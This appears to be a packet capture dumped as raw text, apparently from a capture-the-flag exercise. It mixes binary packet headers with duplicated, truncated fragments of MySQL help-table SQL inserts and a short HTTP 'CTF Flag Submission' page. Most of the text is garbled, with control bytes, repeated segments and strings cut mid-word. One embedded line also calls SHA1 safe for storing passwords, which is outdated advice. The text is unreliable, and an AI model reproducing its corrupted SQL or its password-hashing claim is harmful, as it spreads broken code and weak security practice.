SHA1(str)\n SHA(str)\nCalculates an SHA1 160-bit checksum for the string, as described in\nRFC 3174 (Secure Hash Algorithm). The value is returned as a string of 40 hex\ndigits, or NULL if the argument was NULL.\nOne of the possible uses for this function is as a hash key. You can\nalso use it as a cryptographically safe function for storing passwords.\n','mysql> SELECT SHA1(\'abc\');\n -> \'a9993e364706816aba3e25717850c26c9cd0d89d\'',''),(226,'LONGBLOB',1,' LONGBLOB\n\nA BLOB column with a maximum length of 4,294,967,295 or\n4GB (2^32 - 1) bytes. Up to MySQL\n3.23, the client/server protocol and MyISAM tables had a limit\nof 16MB per communication packet / table row. From MySQL 4.0, the maximum\nallowed length of LONGBLOB columns depends on the\nconfigured maximum packet size in the client/server protocol and available\nmemory.\n','',''),(227,'POINTN',18,' PointN(ls,n)\nReturns the n-th point in the Linestring value ls.\nPoint numbers begin at 1.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT AsText(PointN(GeomFromText(@ls),2));\n+-------------------------------------+\n| AsText(PointN(GeomFromText(@ls),2)) |\n+-------------------------------------+\n| POINT(2 2) Cj5ZZBi0`EL@/u܂Io0E4:@?  PG]a  eK;̌C5bb0`BiET@/Ԁo0SE<*@@  3PBb 7 ) SELECT EXP(-2);\n -> 0.135335',''),(225,'SHA',17,' SHA1(str)\n SHA(str)\nCalculates an SHA1 160-bit checksum for the string, as described in\nRFC 3174 (Secure Hash Algorithm). The value is returned as a string of 40 hex\ndigits, or NULL if the argument was NULL.\nOne of the possible uses for this function is as a hash key. You can\nalso use it as a cryptographically safe function for storing passwords.\n','mysql> SELECT SHA1(\'abc\');\n -> \'a9993e364706816aba3e25717850c26c9cd0d89d\'',''),(226,'LONGBLOB',1,' LONGBLOB\n\nA BLOB column with a maximum length of 4,294,967,295 or\n4GB (2^32 - 1) bytes. Up to MySQL\n3.23, the client/server protocol and MyISAM tables had a limit\nof 16MB per communication packet / table row. From MySQL 4.0, the maximum\nallowed length of LONGBLOB columns depends on the\nconfigured maximum packet size in the client/server protocol and available\nmemory.\n','',''),(227,'POINTN',18,' PointN(ls,n)\nReturns the n-th point in the Linestring value ls.\nPoint numbers begin at 1.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT AsText(PointN(GeomFromText(@ls),2));\n+-------------------------------------+\n| AsText(PointN(GeomFromText(@ls),2)) |\n+-------------------------------------+\n| POINT(2 2) C5ZZ0`BiEL@/ SELECT OCT(12);\n -> \'14\'',''),(230,'SYSDATE',14,' SYSDATE()\n\nSYSDATE() is a synonym for NOW().\n','',''),(231,'ASBINARY',13,' AsBinary(g)\nConverts a value in internal geometry format to its WKB representation\nand returns the binary result.\n','SELECT AsBinary(g) FROM geom;',''),(232,'MAKEDATE',14,' MAKEDATE(year,dayofyear)\n\nReturns a date, given year and day-of-year values.\ndayofyear must be greater than 0 or the result is NULL.\n','mysql> SELECT MAKEDATE(2001,31), MAKEDATE(2001,32);\n -> \'2001-01-31\', \'2001-02-01\'\nmysql> SELECT MAKEDATE(2001,365), MAKEDATE(2004,365);\n -> \'2001-12-31\', \'2004-12-30\'\nmysql> SELECT MAKEDATE(2001,0);\n -> NULL',''),(233,'BINARY OPERATOR',23,' BINARY\nThe BINARY operator casts the string following it to a binarC9bb0`BiET@/Ԁo0SE<*@@  3PJb  ) |\n+-------------------------------------+',''),(228,'SUM',12,' SUM([DISTINCT] expr)\nReturns the sum of expr. If the return set has no rows,\nSUM() returns NULL.\nThe DISTINCT keyword can be used as of MySQL 5.0.0 to sum only the\ndistinct values of expr.\n','',''),(229,'OCT',23,' OCT(N)\nReturns a string representation of the octal value of N, where\nN is a longlong (BIGINT)number. This is equivalent to\nCONV(N,10,8).\nReturns NULL if N is NULL.\n','mysql> SELECT OCT(12);\n -> \'14\'',''),(230,'SYSDATE',14,' SYSDATE()\n\nSYSDATE() is a synonym for NOW().\n','',''),(231,'ASBINARY',13,' AsBinary(g)\nConverts a value in internal geometry format to its WKB representation\nand returns the binary result.\n','SELECT AsBinary(g) FROM geom;',''),(232,'MAKEDATE',14,' MAKEDATE(year,dayofyear)\n\nReturns a date, given year and day-of-year values.\ndayofyear must be greater than 0 or the result is NULL.\n','mysql> SELECT MAKEDATE(2001,31), MAKEDATE(2001,32);\n -> \'2001-01-31\', \'2001-02-01\'\nmysql> SELECT MAKEDATE(2001,365), MAKEDATE(2004,365);\n -> \'2001-12-31\', \'2004-12-30\'\nmysql> SELECT MAKEDATE(2001,0);\n -> NULL',''),(233,'BINARY OPERATOR',23,' BINARY\nThe BINARY operator casts the string following it to a binarC:;bbBi0`ET@/˃2o0E<:@?"  P֞%g en mictopologically closed\n(that is, all defined geometries include their boundary).\n\nThe base Geometry class has subclasses for Point,\nCurve, Surface, and GeometryCollection:\n\n\n --- Point represents zero-dimensional objects.\n\n --- Curve represents one-dimensional objects, and has subclass\nLineString, with sub-subclasses Line and LinearRing.\n\n --- Surface is designed for two-dimensional objects and\nhas subclass Polygon.\n\n --- GeometryCollection\nhas specialized zero-, one-, and two-dimensional collection classes named\nMultiPoint, MultiLineString, and MultiPolygon\nfor modeling geometries corresponding to collections of\nPoints, LineStrings, and Polygons, respectively.\nMultiCurve and MultiSurface are introduced as abstract superclasses\nthat generalize the collection interfaces to handle Curves and Surfaces.\n\n\nGeometry, Curve, Surface, MultiCurve,\nand MultiSurface are defined as non-instantiable classes.\nThey define a common set of methods for their subclasses and\nare included for extensibility.\n\nPoint, LineString, Polygon, GeometryCollection,\nMultiPoint, MultiLineString, and\nMultiPolygon are instantiable classes.\n','',''),(11,'CHAR FUNCTION',23,' CHAR(N,...)\nCHAR() interprets the arguments as integers and returns a string\nconsisting of the chCV;bb0`BiET@/o0AE<:@@!  P֞%g en mictopologically closed\n(that is, all defined geometries include their boundary).\n\nThe base Geometry class has subclasses for Point,\nCurve, Surface, and GeometryCollection:\n\n\n --- Point represents zero-dimensional objects.\n\n --- Curve represents one-dimensional objects, and has subclass\nLineString, with sub-subclasses Line and LinearRing.\n\n --- Surface is designed for two-dimensional objects and\nhas subclass Polygon.\n\n --- GeometryCollection\nhas specialized zero-, one-, and two-dimensional collection classes named\nMultiPoint, MultiLineString, and MultiPolygon\nfor modeling geometries corresponding to collections of\nPoints, LineStrings, and Polygons, respectively.\nMultiCurve and MultiSurface are introduced as abstract superclasses\nthat generalize the collection interfaces to handle Curves and Surfaces.\n\n\nGeometry, Curve, Surface, MultiCurve,\nand MultiSurface are defined as non-instantiable classes.\nThey define a common set of methods for their subclasses and\nare included for extensibility.\n\nPoint, LineString, Polygon, GeometryCollection,\nMultiPoint, MultiLineString, and\nMultiPolygon are instantiable classes.\n','',''),(11,'CHAR FUNCTION',23,' CHAR(N,...)\nCHAR() interprets the arguments as integers and returns a string\nconsisting of the chC4<ZZBi0`EL@/܂Sŀo0E4@? 3 P"lQ )-fC><ZZBi0`EL@/܂Sŀo0E48@? 3 8P tn' )-yᜌCT<ZZ0`BiEL@/go0AE4@@ 3 P"lQ )-fCh<ZZ0`BiEL@/Eo0lE48@@ 3 8P tn' )-yᜌC'>bbBi0`ET@/p܂Ao0E<*@?  3P"Rb 4 )y string.\nThis is an easy way to force a column comparison to be done byte by byte\nrather than character by character. This causes the comparison to be\ncase sensitive even\nif the column isn\'t defined as BINARY or BLOB.\nBINARY also causes trailing spaces to be significant.\n','mysql> SELECT \'a\' = \'A\';\n -> 1\nmysql> SELECT BINARY \'a\' = \'A\';\n -> 0\nmysql> SELECT \'a\' = \'a \';\n -> 1\nmysql> SELECT BINARY \'a\' = \'a \';\n -> 0',''),(234,'MBROVERLAPS',8,' MBROverlaps(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 overlap.\n','',''),(235,'SOUNDEX',23,' SOUNDEX(str)\nReturns a soundex string from str. Two strings that sound almost the\nsame should have identical soundex strings. A standard soundex string\nis four characters long, but the SOUNDEX() function returns an\narbitrarily long string. You can use SUBSTRING() on the result to get\na standard soundex string. All non-alphabetic characters are ignored in the\ngiven string. All international alphabetic characters outside the A-Z range\nare treated as vowels.\n','mysql> SELECT SOUNDEX(\'Hello\');\n -> \'H400\'\nmysql> SELECT SOUNDEX(\'Quadratically\');\n -> \'Q36324\'',''),(236,'SHOW MASTER C1>ZZBi0`EL@/܂Sŀo0E4@? 3 P"lL )-fCI>bb0`BiET@/Ԁo0SE<*@@  3P"Rb 4 )y string.\nThis is an easy way to force a column comparison to be done byte by byte\nrather than character by character. This causes the comparison to be\ncase sensitive even\nif the column isn\'t defined as BINARY or BLOB.\nBINARY also causes trailing spaces to be significant.\n','mysql> SELECT \'a\' = \'A\';\n -> 1\nmysql> SELECT BINARY \'a\' = \'A\';\n -> 0\nmysql> SELECT \'a\' = \'a \';\n -> 1\nmysql> SELECT BINARY \'a\' = \'a \';\n -> 0',''),(234,'MBROVERLAPS',8,' MBROverlaps(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 overlap.\n','',''),(235,'SOUNDEX',23,' SOUNDEX(str)\nReturns a soundex string from str. Two strings that sound almost the\nsame should have identical soundex strings. A standard soundex string\nis four characters long, but the SOUNDEX() function returns an\narbitrarily long string. You can use SUBSTRING() on the result to get\na standard soundex string. All non-alphabetic characters are ignored in the\ngiven string. All international alphabetic characters outside the A-Z range\nare treated as vowels.\n','mysql> SELECT SOUNDEX(\'Hello\');\n -> \'H400\'\nmysql> SELECT SOUNDEX(\'Quadratically\');\n -> \'Q36324\'',''),(236,'SHOW MASTER C[>ZZ0`BiEL@/go0AE4@@ 3 P"lL )-fC?bbBi0`ET@/˃2o0E<;@?"  P֞%g h micaracters given by the code values of those\nintegers. NULL values are skipped.\n','mysql> SELECT CHAR(77,121,83,81,\'76\');\n -> \'MySQL\'\nmysql> SELECT CHAR(77,77.3,\'77.3\');\n -> \'MMM\'',''),(12,'DATETIME',1,'A date and time combination. The supported range is \'1000-01-01\n00:00:00\' to \'9999-12-31 23:59:59\'. MySQL displays\nDATETIME values in \'YYYY-MM-DD HH:MM:SS\' format, but allows you\nto assign values to DATETIME columns using either strings or numbers.\n','',''),(13,'LOWER',23,' LOWER(str)\nReturns the string str with all characters changed to lowercase\naccording to the current character set mapping (the default is ISO-8859-1\nLatin1).\n','mysql> SELECT LOWER(\'QUADRATICALLY\');\n -> \'quadratically\'',''),(14,'MONTH',14,' MONTH(date)\nReturns the month for date, in the range 1 to 12.\n','mysql> SELECT MONTH(\'1998-02-03\');\n -> 2',''),(15,'TINYINT',1,' TINYINT[(M)] [UNSIGNED] [ZEROFILL]\n\nA very small integer. The signed range is -128 to 127. The\nunsigned range is 0 to 255.\n','',''),(16,'ISCLOSED',18,' IsClosed(ls)\nReturns 1 if the LineString value ls is closed\n(that is, its StartPoint() and EndPoint() values are the same).\nReturns 0 if ls is not closed, and -1 if it is NULL.\n','mysql> SET @ls = \'LineStriC?bb0`BiET@/o0AE<;@@!  P֞%g h micaracters given by the code values of those\nintegers. NULL values are skipped.\n','mysql> SELECT CHAR(77,121,83,81,\'76\');\n -> \'MySQL\'\nmysql> SELECT CHAR(77,77.3,\'77.3\');\n -> \'MMM\'',''),(12,'DATETIME',1,'A date and time combination. The supported range is \'1000-01-01\n00:00:00\' to \'9999-12-31 23:59:59\'. MySQL displays\nDATETIME values in \'YYYY-MM-DD HH:MM:SS\' format, but allows you\nto assign values to DATETIME columns using either strings or numbers.\n','',''),(13,'LOWER',23,' LOWER(str)\nReturns the string str with all characters changed to lowercase\naccording to the current character set mapping (the default is ISO-8859-1\nLatin1).\n','mysql> SELECT LOWER(\'QUADRATICALLY\');\n -> \'quadratically\'',''),(14,'MONTH',14,' MONTH(date)\nReturns the month for date, in the range 1 to 12.\n','mysql> SELECT MONTH(\'1998-02-03\');\n -> 2',''),(15,'TINYINT',1,' TINYINT[(M)] [UNSIGNED] [ZEROFILL]\n\nA very small integer. The signed range is -128 to 127. The\nunsigned range is 0 to 255.\n','',''),(16,'ISCLOSED',18,' IsClosed(ls)\nReturns 1 if the LineString value ls is closed\n(that is, its StartPoint() and EndPoint() values are the same).\nReturns 0 if ls is not closed, and -1 if it is NULL.\n','mysql> SET @ls = \'LineStriCCbbBi0`ET@/p܂Ao0E<*@?  3P'Zb  )LOGS',6,'SHOW MASTER LOGS\nSHOW BINARY LOGS\n\nLists the binary log files on the server. This statement is used as part of\nthe procedure described in [PURGE MASTER LOGS, , PURGE MASTER LOGS]\nfor determining which logs can be purged.\n\nmysql> SHOW BINARY LOGS;\n+---------------+-----------+\n| Log_name | File_size |\n+---------------+-----------+\n| binlog.000015 | 724935 |\n| binlog.000016 | 733481 |\n+---------------+-----------+\n','',''),(237,'MBRTOUCHES',8,' MBRTouches(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 touch.\n','',''),(238,'INSERT SELECT',6,'INSERT [LOW_PRIORITY | HIGH_PRIORITY] [IGNORE]\n [INTO] tbl_name [(col_name,...)]\n SELECT ...\n [ ON DUPLICATE KEY UPDATE col_name=expr, ... ]\n\nWith INSERT ... SELECT, you can quickly insert many rows\ninto a table from one or many tables.\n','INSERT INTO tbl_temp2 (fld_id)\n SELECT tbl_temp1.fld_order_id\n FROM tbl_temp1 WHERE tbl_temp1.fld_order_id > 100;',''),(239,'VARBINARY',1,' VARBINARY(M)\n\nThe VARBINARY type is similar to the VARCHAR type, but stores\nbinary byte strings rather than non-binary character strings.\n\nThis type was added in MySQL 4.1.2.\n','',''),(240,'LOAD INDEX',6,'The LOAD INDEX INTO CCbb0`BiET@/Ԁo0SE<*@@  3P'Zb  )LOGS',6,'SHOW MASTER LOGS\nSHOW BINARY LOGS\n\nLists the binary log files on the server. This statement is used as part of\nthe procedure described in [PURGE MASTER LOGS, , PURGE MASTER LOGS]\nfor determining which logs can be purged.\n\nmysql> SHOW BINARY LOGS;\n+---------------+-----------+\n| Log_name | File_size |\n+---------------+-----------+\n| binlog.000015 | 724935 |\n| binlog.000016 | 733481 |\n+---------------+-----------+\n','',''),(237,'MBRTOUCHES',8,' MBRTouches(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 touch.\n','',''),(238,'INSERT SELECT',6,'INSERT [LOW_PRIORITY | HIGH_PRIORITY] [IGNORE]\n [INTO] tbl_name [(col_name,...)]\n SELECT ...\n [ ON DUPLICATE KEY UPDATE col_name=expr, ... ]\n\nWith INSERT ... SELECT, you can quickly insert many rows\ninto a table from one or many tables.\n','INSERT INTO tbl_temp2 (fld_id)\n SELECT tbl_temp1.fld_order_id\n FROM tbl_temp1 WHERE tbl_temp1.fld_order_id > 100;',''),(239,'VARBINARY',1,' VARBINARY(M)\n\nThe VARBINARY type is similar to the VARCHAR type, but stores\nbinary byte strings rather than non-binary character strings.\n\nThis type was added in MySQL 4.1.2.\n','',''),(240,'LOAD INDEX',6,'The LOAD INDEX INTO CDbbBi0`ET@/˃2o0E<<@?"  P֞%g (~ micng(1 1,2 2,3 3)\';\nmysql> SELECT IsClosed(GeomFromText(@ls));\n+-----------------------------+\n| IsClosed(GeomFromText(@ls)) |\n+-----------------------------+\n| 0 |\n+-----------------------------+',''),(17,'MASTER_POS_WAIT',21,' MASTER_POS_WAIT(log_name,log_pos[,timeout])\n\nThis function is useful for control of master/slave synchronization.\nIt blocks until the slave has read and applied all updates up to the specified\nposition in the master log.\nThe return value is the number of log events it had to wait for to get to\nthe specified position. The function returns NULL if the 1000 slave SQL thread\nis not started, the slave\'s master information is not initialized, the\narguments are incorrect, or an error occurs. It returns -1 if the\ntimeout has been exceeded. If the slave SQL thread stops while\nMASTER_POS_WAIT() is waiting, the function returns NULL.\nIf the slave is past the specified position, the function returns\nimmediately.\n','SELECT MASTER_POS_WAIT(\'master_log_file\', master_log_pos)',''),(18,'^',27,' ^\nBitwise XOR:\n','mysql> SELECT 1 ^ 1;\n -> 0\nmysql> SELECT 1 ^ 0;\n -> 1\nmysql> SELECT 11 ^ 3;\n -> 8',''),(19,'DROP VIEW',24,'DROP VIEW removes one or more views. You must have the DROP\npCDbb0`BiET@/o0AE<<@@!  P֞%g (~ micng(1 1,2 2,3 3)\';\nmysql> SELECT IsClosed(GeomFromText(@ls));\n+-----------------------------+\n| IsClosed(GeomFromText(@ls)) |\n+-----------------------------+\n| 0 |\n+-----------------------------+',''),(17,'MASTER_POS_WAIT',21,' MASTER_POS_WAIT(log_name,log_pos[,timeout])\n\nThis function is useful for control of master/slave synchronization.\nIt blocks until the slave has read and applied all updates up to the specified\nposition in the master log.\nThe return value is the number of log events it had to wait for to get to\nthe specified position. The function returns NULL if the 1000 slave SQL thread\nis not started, the slave\'s master information is not initialized, the\narguments are incorrect, or an error occurs. It returns -1 if the\ntimeout has been exceeded. If the slave SQL thread stops while\nMASTER_POS_WAIT() is waiting, the function returns NULL.\nIf the slave is past the specified position, the function returns\nimmediately.\n','SELECT MASTER_POS_WAIT(\'master_log_file\', master_log_pos)',''),(18,'^',27,' ^\nBitwise XOR:\n','mysql> SELECT 1 ^ 1;\n -> 0\nmysql> SELECT 1 ^ 0;\n -> 1\nmysql> SELECT 11 ^ 3;\n -> 8',''),(19,'DROP VIEW',24,'DROP VIEW removes one or more views. You must have the DROP\npCGbbBi0`ET@/p܂Ao0E<*@?  3P,bb  )CACHE statement preloads a table index into the\nkey cache to which it has been assigned by an explicit CACHE INDEX\nstatement, or into the default key cache otherwise. LOAD INDEX INTO\nCACHE is used only for MyISAM tables.\n\nThe IGNORE LEAVES modifier causes only blocks for the non-leaf\nnodes of the index to be preloaded.\n','LOAD INDEX INTO CACHE\n tbl_index_list [, tbl_index_list] ...\n\ntbl_index_list:\n tbl_name\n [[INDEX|KEY] (index_name[, index_name] ...)]\n [IGNORE LEAVES]',''),(241,'UNION',6,'UNION is used to combine the result from many SELECT\nstatements into one result set. UNION is available from MySQL 4.0.0\non.\n\nSelected columns listed in corresponding positions of each SELECT\nstatement should have the same type. (For example, the first column selected\nby the first statement should have the same type as the first column selected\nby the other statements.) The column names used in\nthe first SELECT statement are used as the column names for the\nresults returned.\n','SELECT ...\nUNION [ALL | DISTINCT]\nSELECT ...\n [UNION [ALL | DISTINCT]\n SELECT ...]',''),(242,'TO_DAYS',14,' TO_DAYS(date)\nGiven a date date, returns a daynumber (the number of days since year\n0).\n','mysql> SELECT TO_DAYS(950501);\n -> 728779\nmysql> SELECT CGZZBi0`EL@/Ao0E4@?H  PPZπ"l] d5^C Hbb0`BiET@/Ԁo0SE<*@@  3P,bb  )CACHE statement preloads a table index into the\nkey cache to which it has been assigned by an explicit CACHE INDEX\nstatement, or into the default key cache otherwise. LOAD INDEX INTO\nCACHE is used only for MyISAM tables.\n\nThe IGNORE LEAVES modifier causes only blocks for the non-leaf\nnodes of the index to be preloaded.\n','LOAD INDEX INTO CACHE\n tbl_index_list [, tbl_index_list] ...\n\ntbl_index_list:\n tbl_name\n [[INDEX|KEY] (index_name[, index_name] ...)]\n [IGNORE LEAVES]',''),(241,'UNION',6,'UNION is used to combine the result from many SELECT\nstatements into one result set. UNION is available from MySQL 4.0.0\non.\n\nSelected columns listed in corresponding positions of each SELECT\nstatement should have the same type. (For example, the first column selected\nby the first statement should have the same type as the first column selected\nby the other statements.) The column names used in\nthe first SELECT statement are used as the column names for the\nresults returned.\n','SELECT ...\nUNION [ALL | DISTINCT]\nSELECT ...\n [UNION [ALL | DISTINCT]\n SELECT ...]',''),(242,'TO_DAYS',14,' TO_DAYS(date)\nGiven a date date, returns a daynumber (the number of days since year\n0).\n','mysql> SELECT TO_DAYS(950501);\n -> 728779\nmysql> SELECT CHZZ0`BiEL@/o0  E4@@G  PPZπ"l] d5^CH__BiʪEQ@/o0oo0E9>1@@ sPZK9=.P ĞHTTP/1.0 200 OK CH__0`BiEQ@/Eo0lE9>1@@ sPZK9=.P ĞHTTP/1.0 200 OK CJbbBi0`ET@/˃2o0E<=@?"  P֞%g  mmcrivilege for each view.\n\nYou can use the keywords IF EXISTS to prevent an error from occurring\nfor views that don\'t exist. When this clause is given, a NOTE is\ngenerated for each non-existent view.\nSee also : [SHOW WARNINGS, , SHOW WARNINGS].\n\nRESTRICT and CASCADE, if given, are parsed and ignored.\n','DROP VIEW [IF EXISTS]\n view_name [, view_name] ...\n [RESTRICT | CASCADE]',''),(20,'DATE OPERATIONS',14,' DATE_ADD(date,INTERVAL expr type)\n DATE_SUB(date,INTERVAL expr type)\n\nThese functions perform date arithmetic.\ndate is a DATETIME or DATE value specifying the starting\ndate. expr is an expression specifying the interval value to be added\nor subtracted from the starting date. expr is a string; it may start\nwith a \'-\' for negative intervals. type is a keyword indicating\nhow the expression should be interpreted.\n','mysql> SELECT \'1997-12-31 23:59:59\' + INTERVAL 1 SECOND;\n -> \'1998-01-01 00:00:00\'\nmysql> SELECT INTERVAL 1 DAY + \'1997-12-31\';\n -> \'1998-01-01\'\nmysql> SELECT \'1998-01-01\' - INTERVAL 1 SECOND;\n -> \'1997-12-31 23:59:59\'\nmysql> SELECT DATE_ADD(\'1997-12-31 23:59:59\',\n -> INTERVAL 1 SECOND);\n -> \'1998-01-01 00:00:00\'\nmysql> SELECT DATE_ADD(\'1997-12-31 23:5CJbb0`BiET@/o0AE<=@@!  P֞%g  mmcrivilege for each view.\n\nYou can use the keywords IF EXISTS to prevent an error from occurring\nfor views that don\'t exist. When this clause is given, a NOTE is\ngenerated for each non-existent view.\nSee also : [SHOW WARNINGS, , SHOW WARNINGS].\n\nRESTRICT and CASCADE, if given, are parsed and ignored.\n','DROP VIEW [IF EXISTS]\n view_name [, view_name] ...\n [RESTRICT | CASCADE]',''),(20,'DATE OPERATIONS',14,' DATE_ADD(date,INTERVAL expr type)\n DATE_SUB(date,INTERVAL expr type)\n\nThese functions perform date arithmetic.\ndate is a DATETIME or DATE value specifying the starting\ndate. expr is an expression specifying the interval value to be added\nor subtracted from the starting date. expr is a string; it may start\nwith a \'-\' for negative intervals. type is a keyword indicating\nhow the expression should be interpreted.\n','mysql> SELECT \'1997-12-31 23:59:59\' + INTERVAL 1 SECOND;\n -> \'1998-01-01 00:00:00\'\nmysql> SELECT INTERVAL 1 DAY + \'1997-12-31\';\n -> \'1998-01-01\'\nmysql> SELECT \'1998-01-01\' - INTERVAL 1 SECOND;\n -> \'1997-12-31 23:59:59\'\nmysql> SELECT DATE_ADD(\'1997-12-31 23:59:59\',\n -> INTERVAL 1 SECOND);\n -> \'1998-01-01 00:00:00\'\nmysql> SELECT DATE_ADD(\'1997-12-31 23:5CKbbBi0`ET@/p܂Ao0E<*@?  3P1jb 8 )TO_DAYS(\'1997-10-07\');\n -> 729669',''),(243,'NOT REGEXP',23,' expr NOT REGEXP pat\n expr NOT RLIKE pat\n\nThis is the same as NOT (expr REGEXP pat).\n','',''),(244,'NOT IN',26,' expr NOT IN (value,...)\nThis is the same as NOT (expr IN (value,...)).\n','',''),(245,'!',20,' NOT\n !\nLogical NOT.\nEvaluates to 1 if the operand is 0,\nto 0 if the operand is non-zero,\nand NOT NULL returns NULL.\n','mysql> SELECT NOT 10;\n -> 0\nmysql> SELECT NOT 0;\n -> 1\nmysql> SELECT NOT NULL;\n -> NULL\nmysql> SELECT ! (1+1);\n -> 0\nmysql> SELECT ! 1+1;\n -> 1',''),(246,'TEXT TYPE',1,' TEXT[(M)]\n\nA TEXT column with a maximum length of 65,535\n(2^16 - 1) characters.\n\nBeginning with MySQL 4.1, an optional length M can be given.\nMySQL will create the column as the smallest TEXT type largest\nenough to hold values M characters long.\n','',''),(247,'DOUBLE',1,' DOUBLE[(M,B)] [UNSIGNED] [ZEROFILL]\n\nA normal-size (double-precision) floating-point number. Allowable values are\n-1.7976931348623157E+308 to -2.2250738585072014E-308,\n0, and 2.2250738585072014E-308 to 1.7976931348623157E+308.\nIf UNSIGNED is specified, negative values are disallowed. M is the\ndisplay width and B is the number of bits of precision. DOUBLE\nwithouCKZZBi0`EL@/uAo0E4&3@?L  3P.5yc G )CKbb0`BiET@/Ԁo0SE<*@@  3P1jb 8 )TO_DAYS(\'1997-10-07\');\n -> 729669',''),(243,'NOT REGEXP',23,' expr NOT REGEXP pat\n expr NOT RLIKE pat\n\nThis is the same as NOT (expr REGEXP pat).\n','',''),(244,'NOT IN',26,' expr NOT IN (value,...)\nThis is the same as NOT (expr IN (value,...)).\n','',''),(245,'!',20,' NOT\n !\nLogical NOT.\nEvaluates to 1 if the operand is 0,\nto 0 if the operand is non-zero,\nand NOT NULL returns NULL.\n','mysql> SELECT NOT 10;\n -> 0\nmysql> SELECT NOT 0;\n -> 1\nmysql> SELECT NOT NULL;\n -> NULL\nmysql> SELECT ! (1+1);\n -> 0\nmysql> SELECT ! 1+1;\n -> 1',''),(246,'TEXT TYPE',1,' TEXT[(M)]\n\nA TEXT column with a maximum length of 65,535\n(2^16 - 1) characters.\n\nBeginning with MySQL 4.1, an optional length M can be given.\nMySQL will create the column as the smallest TEXT type largest\nenough to hold values M characters long.\n','',''),(247,'DOUBLE',1,' DOUBLE[(M,B)] [UNSIGNED] [ZEROFILL]\n\nA normal-size (double-precision) floating-point number. Allowable values are\n-1.7976931348623157E+308 to -2.2250738585072014E-308,\n0, and 2.2250738585072014E-308 to 1.7976931348623157E+308.\nIf UNSIGNED is specified, negative values are disallowed. M is the\ndisplay width and B is the number of bits of precision. DOUBLE\nwithouCLZZ0`BiEL@/܀o0SE4&3@@L  3P.5yc G )C LBiʪE@/o0oo0E>3@@ sPZKJ=.P Content-Type: text/html CTF Flag Submission

Flag Submission

Enter your flag here:

CL0`BiE@/Do0lE>3@@ sPZKJ=.P Content-Type: text/html CTF Flag Submission

Flag Submission

Enter your flag here:

CHMZZBi0`EL@/܂Sŀo0E4@? 3 P "lG ).iCRMffBi0`EX@/ЂSŀo0E@@? 3 P "l ).i sCYMZZBi0`EL@/܂Sŀo0E4@? 3 Ps"l@] ).iCoMZZ0`BiEL@/go0AE4@@ 3 P "lG ).iCMff0`BiEX@/g؀o0AE@@@ 3 P "l ).i sCMZZ0`BiEL@/go0AE4@@ 3 Ps"l@] ).iC@?"  P֞%g  mmc9:59\',\n -> INTERVAL 1 DAY);\n -> \'1998-01-01 23:59:59\'\nmysql> SELECT DATE_ADD(\'1997-12-31 23:59:59\',\n -> INTERVAL \'1:1\' MINUTE_SECOND);\n -> \'1998-01-01 00:01:00\'\nmysql> SELECT DATE_SUB(\'1998-01-01 00:00:00\',\n -> INTERVAL \'1 1:1:1\' DAY_SECOND);\n -> \'1997-12-30 22:58:59\'\nmysql> SELECT DATE_ADD(\'1998-01-01 00:00:00\',\n -> INTERVAL \'-1 10\' DAY_HOUR);\n -> \'1997-12-30 14:00:00\'\nmysql> SELECT DATE_SUB(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1997-12-02\'\nmysql> SELECT DATE_ADD(\'1992-12-31 23:59:59.000002\',\n -> INTERVAL \'1.999999\' SECOND_MICROSECOND);\n -> \'1993-01-01 00:00:01.000001\'',''),(21,'WITHIN',11,' Within(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 is spatially within\ng2.\n','',''),(22,'WEEK',14,' WEEK(date[,mode])\nThe function returns the week number for date. The two-argument form\nof WEEK() allows you to specify whether the week starts on Sunday or\nMonday and whether the return value should be in the range from 0 to\n53 or from 1 to 53. If the mode argument is\nomitted, the value of the default_week_format system variable is\nused (or 0 before MySQL 4.0.14).\nSee also : [Server sCXObb0`BiET@/o0AE<>@@!  P֞%g  mmc9:59\',\n -> INTERVAL 1 DAY);\n -> \'1998-01-01 23:59:59\'\nmysql> SELECT DATE_ADD(\'1997-12-31 23:59:59\',\n -> INTERVAL \'1:1\' MINUTE_SECOND);\n -> \'1998-01-01 00:01:00\'\nmysql> SELECT DATE_SUB(\'1998-01-01 00:00:00\',\n -> INTERVAL \'1 1:1:1\' DAY_SECOND);\n -> \'1997-12-30 22:58:59\'\nmysql> SELECT DATE_ADD(\'1998-01-01 00:00:00\',\n -> INTERVAL \'-1 10\' DAY_HOUR);\n -> \'1997-12-30 14:00:00\'\nmysql> SELECT DATE_SUB(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1997-12-02\'\nmysql> SELECT DATE_ADD(\'1992-12-31 23:59:59.000002\',\n -> INTERVAL \'1.999999\' SECOND_MICROSECOND);\n -> \'1993-01-01 00:00:01.000001\'',''),(21,'WITHIN',11,' Within(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 is spatially within\ng2.\n','',''),(22,'WEEK',14,' WEEK(date[,mode])\nThe function returns the week number for date. The two-argument form\nof WEEK() allows you to specify whether the week starts on Sunday or\nMonday and whether the return value should be in the range from 0 to\n53 or from 1 to 53. If the mode argument is\nomitted, the value of the default_week_format system variable is\nused (or 0 before MySQL 4.0.14).\nSee also : [Server sCPbbBi0`ET@/p܂Ao0E<*@?  3P6rb   )t arguments or FLOAT(p) (where p is in the range from\n25 to 53) stands for a double-precision floating-point number. A\nsingle-precision floating-point number is accurate to approximately 7 decimal\nplaces; a double-precision floating-point number is accurate to approximately 15\ndecimal places.\n\n DOUBLE PRECISION[(M,D)] [UNSIGNED] [ZEROFILL]\n REAL[(M,D)] [UNSIGNED] [ZEROFILL]\n\nThese are synonyms for DOUBLE.\nException: If the server SQL mode includes the REAL_AS_FLOAT option,\nREAL is a synonym for FLOAT rather than DOUBLE.\n','',''),(248,'TIME',1,' TIME\n\nA time. The range is \'-838:59:59\' to \'838:59:59\'.\nMySQL displays TIME values in \'HH:MM:SS\' format, but\nallows you to assign values to TIME columns using either strings or\nnumbers.\n','',''),(249,'&&',20,' AND\n &&\nLogical AND.\nEvaluates to 1 if all operands are non-zero and not NULL,\nto 0 